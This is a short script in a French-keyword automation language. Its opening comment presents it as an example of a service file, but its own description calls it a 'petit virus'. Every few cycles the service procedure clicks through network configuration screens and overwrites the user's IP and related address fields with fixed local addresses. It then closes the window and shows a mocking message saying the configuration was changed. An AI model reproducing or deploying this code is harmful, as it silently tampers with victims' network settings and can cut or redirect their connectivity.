REM/ Ce fichier est un exemple de mise en forme d'un fichier de service


REM/ Variables a communiquer pour cette fonction :
rem/	MA_FENETRE



SI/ %MA_VARIABLE_SVC% = 1 (:ALLER/ ACTIVER:)
rem/ Sinon on desactive le service (l'objet le COMPTEUR)

:DESACTIVER:

INI/ COMPTEUR(
	INI;NOM 	= "SVC_EXEMPLE"
	INI;ACTIVE 	= "0"
	Creer/
INI/ COMPTEUR)

TXT/ Service desactive

stop/


:ACTIVER:


INI/ COMPTEUR(
	INI;NOM 	= "SVC_EXEMPLE"
	INI;FENETRE 	= "%SRV_SVC%"
	INI;INTERVALLE 	= "5"
	INI;ACTIVE 	= "1"
	Creer/
	EV/ %EXE_EN_COURS%
INI/ COMPTEUR)


TXT/ Kernel : Service en cours d'execution

stop/



PROC/ SVC_EXEMPLE(CYCLE)
	REM/ ICI le cycle
	EV/ /EXE IMG_PMT:CLIC
	EV/ /EXE IMG_NET:CLIC
	EV/ /EXE CFT_MODIFIER_BTN:CLIC
	ini/ textebox(
		ini;nom = "CFT_IP_TXTBOX"
		ini;texte = "192.168.1.15"
		creer/
	ini/ textebox)
	ini/ textebox(
		ini;nom = "CFT_PASSRL_TXTBOX"
		ini;texte = "192.168.1.10"
		creer/
	ini/ textebox)
	ini/ textebox(
		ini;nom = "CFT_MSR_TXTBOX"
		ini;texte = "192.168.1.15"
		creer/
	ini/ textebox)
	EV/ /EXE CFT_CHECK_BTN:CLIC
	fermer/ CFT_CONFIG
	MSGBOX/ J'ai modifie ta configuration IP mouahaha!
FIN/ PROC

stop/
:DESCRIPTION:
FIX/ SVC_DESCRIPTION = Petit virus
@stop/